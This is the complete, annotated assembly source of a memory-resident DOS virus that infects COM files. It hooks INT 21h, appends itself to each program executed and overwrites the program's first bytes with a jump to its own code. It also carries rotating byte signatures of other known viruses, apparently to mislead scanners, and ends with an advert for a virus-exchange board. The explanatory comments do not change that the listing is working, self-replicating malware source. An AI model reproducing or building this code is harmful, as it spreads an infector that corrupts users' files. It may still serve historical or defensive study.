;****************************************************************************
;* stripped COM version
;* with signatures
;*
;* Reading notes for this listing:
;*  - The dialect is MASM/TASM (segment/assume/org/equ, `dup (?)`, `ptr`,
;*    `.RADIX`), not NASM as the page header claims.
;*  - `.RADIX 16` at the end of this block makes every unsuffixed numeral
;*    hexadecimal from that point on: `int 20` is INT 20h, `mov di,0100`
;*    is 0100h, `sub ax,0103` is 103h.
;*  - One code segment in COM layout (org 100h); all data lives in CS and
;*    is reached through CS or through DS after `push cs / pop ds`.
;****************************************************************************

cseg segment
assume cs:cseg,ds:cseg,es:nothing

org 100h

SIGNLEN equ signend - signature ;length of the 'GOTCHA!',0 marker (8 bytes)
FILELEN equ eind - begin ;size of the whole image that is appended and copied resident
RESPAR equ (FILELEN/16) + 17 ;paragraphs reserved for the resident copy; written before .RADIX 16, so 16 and 17 are presumably decimal -- confirm with the assembler
BUFLEN equ 08h ;number of leading host bytes that are saved and later restored
VERSION equ 4 ;returned in AL by the AX=0DADAh installation check

.RADIX 16 ;unsuffixed numerals are hexadecimal from here on
;****************************************************************************
;* Start-up when the file is run directly (not from an infected host)
;*
;* BX = 0: the image sits at its assembled origin (100h), so the relocation
;* delta that `entry` computes for a host image is zero here.
;* The loop calls crypt with CL = 7, 6, ..., 1, complementing virsig
;* records 1..7 and leaving record 0 in clear.  `loop` counts on the full
;* CX while only CL is set.  Then the resident part is installed and the
;* process terminates via INT 20h (`int 20`, .RADIX 16 in effect).
;****************************************************************************

begin: xor bx,bx ;relocation delta = 0
mov cl,07h
crloop: call crypt ;complement virsig record number CL
loop crloop
call install ;go resident (BX = 0)
int 20 ;= INT 20h, terminate program
;****************************************************************************
;* Data
;****************************************************************************

buffer db BUFLEN dup (?) ;scratch: first the file tail read for the marker test, then the host's first BUFLEN bytes (restored by `entry`)
oi21 dw ?,? ;saved INT 21h vector: offset, segment
oldlen dw ? ;low word of the host length before appending (from eindptr)
handle dw ? ;DOS handle of the file attach currently has open
sign db 0 ;index 0..7 of the virsig record currently in clear; advanced on every intercepted EXEC
;****************************************************************************
;* INT 21h handler (installed by `install`)
;*
;* Two functions are intercepted; everything else is chained to the saved
;* vector with the caller's flags intact:
;*   AX=4B00h (EXEC, load and run): `attach` is called with the caller's
;*            DS:DX (ASCIIZ path of the program about to run).  Then the
;*            virsig record [sign] is complemented, sign is advanced mod 8
;*            and the new record is complemented, so -- given the state set
;*            up by `begin` -- one record is in clear at any time, rotating
;*            with each EXEC.  The call is chained afterwards.
;*   AX=0DADAh: installation check, answered directly with
;*            AX = 0A500h + VERSION (not chained).
;* General registers and DS/ES are saved around attach/crypt; attach changes
;* DS, so oi21 is addressed via CS at the chain point.
;****************************************************************************

ni21: pushf

cmp ax,4B00h ;DOS EXEC, load and execute?
jne ni_verder

push es
push ds
push ax
push bx
push cx
push dx

call attach ;DS:DX = caller's file name

mov cl,[sign] ;via DS, which attach set to CS after a successful open (on an open failure DS is still the caller's here)
call crypt ;hide the record that was in clear
inc cl
and cl,07h ;8 records in virsig
mov [sign],cl
call crypt ;expose the next record

pop dx
pop cx
pop bx
pop ax
pop ds
pop es

exit: popf
jmp dword ptr cs:[oi21] ;chain to the original INT 21h handler

ni_verder: cmp ax,0DADAh ;installation check: "already resident?"
jne exit
mov ax,0A500h+VERSION ;AH = 0A5h acknowledges, AL = version
popf
iret
<doc_update>
;****************************************************************************
;* Append the program to a file (ASCIIZ path in DS:DX)
;*
;* Called from ni21 on an EXEC.  Any DOS error (CF) skips to finnish.
;*   1. open read/write, keep the handle, DS := CS from here on;
;*   2. seek to end: DX:AX = length, low word kept in oldlen;
;*   3. read the last SIGNLEN bytes and compare with `signature`; a match
;*      means the marker is already there -> done;
;*   4. read the first BUFLEN bytes; files starting with 'MZ' (EXE header)
;*      are left alone;
;*   5. writeprog appends the whole image -- its `buffer` still holds the
;*      original first bytes, which `entry` later copies back;
;*   6. the file's first bytes are overwritten with JMP rel16 to `entry`
;*      (0E9h, oldlen + offset entry - 103h) followed by the rest of buffer
;*      unchanged;
;*   7. close the handle.
;* Clobbers AX, BX, CX, DX, SI, DI, DS, ES and flags.
;****************************************************************************

attach: cld

mov ax,3D02h ;open the file, read/write access
int 21
jc finnish ;note: the close at finnish then uses whatever `handle` held before

push cs
pop ds
mov [handle],ax ;save file handle

call eindptr ;determine length: DX:AX
jc finnish
mov [oldlen],ax

sub ax,SIGNLEN ;position = length - SIGNLEN
sbb dx,0
mov cx,dx ;LSEEK takes the offset in CX:DX
mov dx,ax
mov al,00h ;from start of file
call ptrmov
jc finnish

mov cx,SIGNLEN ;read the last bytes
mov dx,offset buffer
call flread
jc finnish

verder3: push cs ;compare marker with buffer
pop es
mov di,offset buffer
mov si,offset signature
mov cx,SIGNLEN
rep cmpsb
or cx,cx ;CX = 0 -> all bytes matched (already marked); a mismatch confined to the last byte also leaves CX = 0
jz finnish

call beginptr ;read start of file (CF of this seek is not checked)
mov cx,BUFLEN
mov dx,offset buffer
call flread
jc finnish

cmp word ptr [buffer],5A4Dh ;'MZ' header: EXE, leave alone
jz finnish

call writeprog ;append image to the file
jc finnish

mov ax,[oldlen] ;build the jump: target = oldlen + offset entry
add ax,offset entry ; (entry sits at oldlen + (entry - 100h) from the file start, loaded at 100h)
sub ax,0103 ;minus 103h, the IP after a 3-byte JMP at 100h
mov byte ptr [buffer],0E9h ;JMP rel16
mov word ptr [buffer+1],ax

call beginptr ;rewrite the start of the file
mov cx,BUFLEN
mov dx,offset buffer
call flwrite
jc finnish

finnish: mov bx,[handle] ;close the file
mov ah,3Eh
int 21

ret
;****************************************************************************
;* Complement one virsig record in place (XOR every word with 0FFFFh)
;*
;* In:   CL = record index; a record is 14h = 20 bytes = 0Ah words, so
;*       indices 0..7 stay inside the 160-byte table.
;* Out:  CX preserved; the record is toggled (a second call restores it).
;* Clobbers AX, SI, DI, flags; sets DS = ES = CS.
;* Uses the assembled `offset virsig`, so it is only correct while the
;* image sits at its origin -- true for the direct start (`begin`) and for
;* the resident copy (ni21), the only two callers.
;****************************************************************************

crypt: push cx
mov al,14h ;AX = 14h * CL: byte offset of the record
mul cl
add ax,offset virsig
mov si,ax ;read and write the same location
mov di,ax
push cs
push cs
pop ds
pop es
mov cx,0Ah ;10 words
cryploop: lodsw
xor ax,0FFFFh ;complement
stosw
loop cryploop
pop cx
ret
;****************************************************************************
;* Append the whole image (FILELEN bytes from `begin`) to the open file
;*
;* Seeks to the end (CF from that seek is overwritten by the write), then
;* writes from CS:begin.  Returns CF from the write, AX = bytes written.
;* Assumes the image is at its origin (offset begin = 100h in CS), which
;* holds for the resident copy that calls this.  Clobbers AX, BX, CX, DX, DS.
;****************************************************************************

writeprog: call eindptr
mov cx,FILELEN
mov dx,offset begin
call flwrite
ret
;****************************************************************************
;* File-pointer subroutines (DOS INT 21h AH=42h, LSEEK)
;*
;* beginptr: offset 0 from the start of the file (AL=0).
;* eindptr:  offset 0 from the end of the file (AL=2) -> DX:AX = length.
;* ptrmov:   AL = method, CX:DX = offset, BX := [handle] (read via DS, so
;*           DS must address the program's data).
;* All return DX:AX = new position and CF set on a DOS error.
;* Clobbers AX, BX, CX, DX, flags.
;****************************************************************************

beginptr: mov al,00h ;to start of file
xor cx,cx
xor dx,dx
jmp ptrmov

eindptr: mov al,02h ;to end of file
xor cx,cx
xor dx,dx
; jmp ptrmov ;falls through into ptrmov

ptrmov: mov ah,42h ;LSEEK
mov bx,[handle]
int 21
ret
;****************************************************************************
;* Read/write subroutines (DOS INT 21h AH=40h write, AH=3Fh read)
;*
;* In:  CX = byte count, DX = offset of the buffer within CS.
;* Both force DS = CS (and leave it so), take BX from [handle], and return
;* AX = bytes transferred with CF set on a DOS error.  Clobbers AX, BX, DS.
;****************************************************************************

flwrite: push cs
pop ds
mov ah,40h ;write to handle
mov bx,[handle]
int 21
ret


flread: push cs
pop ds
mov ah,3Fh ;read from handle
mov bx,[handle]
int 21
ret
;****************************************************************************
;* Activation from an infected host
;*
;* The host's first bytes were replaced by a JMP here and the image sits at
;* an unknown offset, so assembled offsets cannot be used as they are.  The
;* CALL/POP pair yields BX = (actual offset of entry2) - (assembled offset
;* of entry2): the relocation delta to add to every data offset.
;* Steps: copy the host's saved first BUFLEN bytes from buffer back to
;* CS:100h; push 100h as return address; ask via AX=0DADAh whether a copy
;* is resident (AH=0A5h) and call install if not; RET then starts the
;* repaired host at 100h with BX still holding the delta for install.
;* Relies on DS = ES = CS as DOS sets them for a COM program.  General
;* registers are not restored before the host runs.
;* Under .RADIX 16, `mov di,0100` is 0100h.
;****************************************************************************

entry: call entry2
entry2: pop bx
sub bx,offset entry2 ;CS:BX = program start - 100h, i.e. the relocation delta

cld

mov ax,bx ;copy the original start back to 100h
add ax,offset buffer
mov si,ax
mov di,0100
mov cx,BUFLEN
rep movsb

mov ax,0100h
push ax ;return address: run the host

entcall: mov ax,0DADAh ;already installed?
int 21h
cmp ah,0A5h
je entstop

call install ;install the program (BX = delta)

entstop: ret
;****************************************************************************
;* Install the resident copy
;*
;* In:  BX = relocation delta (0 from `begin`, computed by `entry`);
;*      DS = this program's PSP segment, as DOS sets it for a COM program.
;*   1. read the INT 21h vector from 0000:0084h/0086h into [bx+oi21];
;*   2. DS-1 is expected to be this program's memory control block: its
;*      signature must be 5Ah ('Z', last block); RESPAR paragraphs are
;*      taken off its size (cancel on underflow) and off the word at
;*      ES:[0012h], which is PSP:[0002h] (top-of-memory segment) because the
;*      PSP follows the 16-byte MCB;
;*   3. copy FILELEN bytes from DS:[bx+100h] to offset 100h of the segment
;*      now in PSP:[2], so the image ends up at its assembled origin in the
;*      area just carved off the top of the block;
;*   4. point INT 21h (AH=25h) at ni21 in that segment.
;* DS/ES are saved and restored on both paths; BX is left unchanged.
;* Clobbers AX, CX, DX, SI, DI, flags.
;****************************************************************************

install: push ds
push es

xor ax,ax ;fetch the old vector
mov es,ax
mov cx,word ptr es:0084h ;offset
mov dx,word ptr es:0086h ;segment
mov [bx+offset oi21],cx
mov [bx+offset oi21+2],dx

mov ax,ds ;adjust memory size
dec ax
mov es,ax ;ES = this program's MCB
cmp byte ptr es:[0000h],5Ah ;'Z': last block in the chain
jnz cancel
mov ax,es:[0003h] ;block size in paragraphs
sub ax,RESPAR
jb cancel ;not enough memory
mov es:[0003h],ax
sub es:[0012h], word ptr RESPAR ;PSP:[0002h] -= RESPAR

mov es,es:[0012h] ;copy the image to the top
mov ax,bx
add ax,0100 ;source = DS:[bx+100h] (.RADIX 16)
mov si,ax
mov di,0100h
mov cx,FILELEN
rep movsb

mov dx,offset ni21 ;set the new vector
push es
pop ds
mov ax,2521h ;INT 21h := DS:DX
int 21h

cancel: pop es
pop ds

ret
;****************************************************************************
;* Text and signatures
;*
;* virsig: 8 records of 20 bytes (5 x 4 `db`), one per author's label below.
;* crypt addresses them by record number and `and cl,07h` in ni21 wraps the
;* index at 8, so the record count and that mask must stay in step.  The
;* labels are the author's; following the state set up by `begin` and
;* rotated by ni21, only record [sign] is in clear at run time, the others
;* are complemented.  The three groups after the table are alternatives the
;* author kept commented out.
;* signature: the SIGNLEN-byte (8) marker written at the end of every file
;* the program has been appended to and checked by attach.
;****************************************************************************

virsig:
;SYSLOCK Virus
db 0D1h, 0E9h, 8Ah, 0E1h
db 8Ah, 0C1h, 33h, 06h
db 14h, 00h, 31h, 04h
db 46h, 46h, 0E2h, 0F2h
db 5Eh, 59h, 58h, 0C3h
;Sylvia Virus
db 8Dh, 36h, 03h, 01h
db 33h, 0C9h, 33h, 0C0h
db 0ACh, 3Ch, 1Ah, 74h
db 04h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;DATACRIME IIb Virus
db 2Eh, 8Ah, 07h, 32h
db 0C2h, 0D0h, 0CAh, 2Eh
db 88h, 07h, 43h, 0E2h
db 0F3h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;Yankee-Go-Home Virus (Enigma)
db 0D8h, 0Eh, 1Fh, 0BEh
db 37h, 08h, 81h, 0EEh
db 03h, 01h, 03h, 0F3h
db 89h, 04h, 0BEh, 39h
db 08h, 81h, 0EEh, 03h
;Slowdown Virus
db 0DEh, 90h, 90h, 81h
db 0C6h, 1Bh, 00h, 0B9h
db 90h, 06h, 2Eh, 80h
db 34h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;Scotts Valley Virus
db 5Eh, 8Bh, 0DEh, 90h
db 90h, 81h, 0C6h, 32h
db 00h, 0B9h, 12h, 08h
db 2Eh, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;Tiny-2A related Virus
db 0A5h, 8Eh, 0C1h, 0A6h
db 74h, 12h, 4Eh, 4Fh
db 0F3h, 0A5h, 8Eh, 0C1h
db 93h, 91h, 91h, 26h
db 87h, 85h, 0E0h, 0FEh
;DATACRIME 1280 Virus
db 8Bh, 36h, 01h, 01h
db 83h, 0EEh, 03h, 8Bh
db 0C6h, 3Dh, 00h, 00h
db 75h, 03h, 0E9h, 02h
db 01h, 90h, 90h, 90h


;; Commented-out alternative records (not assembled):
;;July13 Virus
; db 0A0h, 12h, 00h, 34h
; db 90h, 0BEh, 12h, 00h
; db 0B9h, 0B1h, 04h, 2Eh
; db 30h, 04h, 46h, 0E2h
; db 0FAh, 90h, 90h, 90h
;;XA1 Virus (Tannenbaum)
;virsig: db 0FAh, 8Bh, 0ECh, 58h
; db 32h, 0C0h, 89h, 46h
; db 02h, 81h, 46h, 00h
; db 28h, 00h, 90h, 90h
; db 90h, 90h, 90h, 90h
;;Twelve Tricks Trojan Dropper
; db 0BEh, 64h, 02h, 31h
; db 94h, 42h, 01h, 0D1h
; db 0C2h, 4Eh, 79h, 0F7h
; db 90h, 90h, 90h, 90h
; db 90h, 90h, 90h, 90h



signature: db 'GOTCHA!',0 ;file marker, SIGNLEN = 8 bytes
signend:

eind: ;end of the image: FILELEN = eind - begin

cseg ends
end begin ;entry point when the file is run directly
; ----------------------------------------------------------------------------
; --------------------> and Remember Don't Forget to Call <--------------------
; ------------> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <-------------
; ----------------------------------------------------------------------------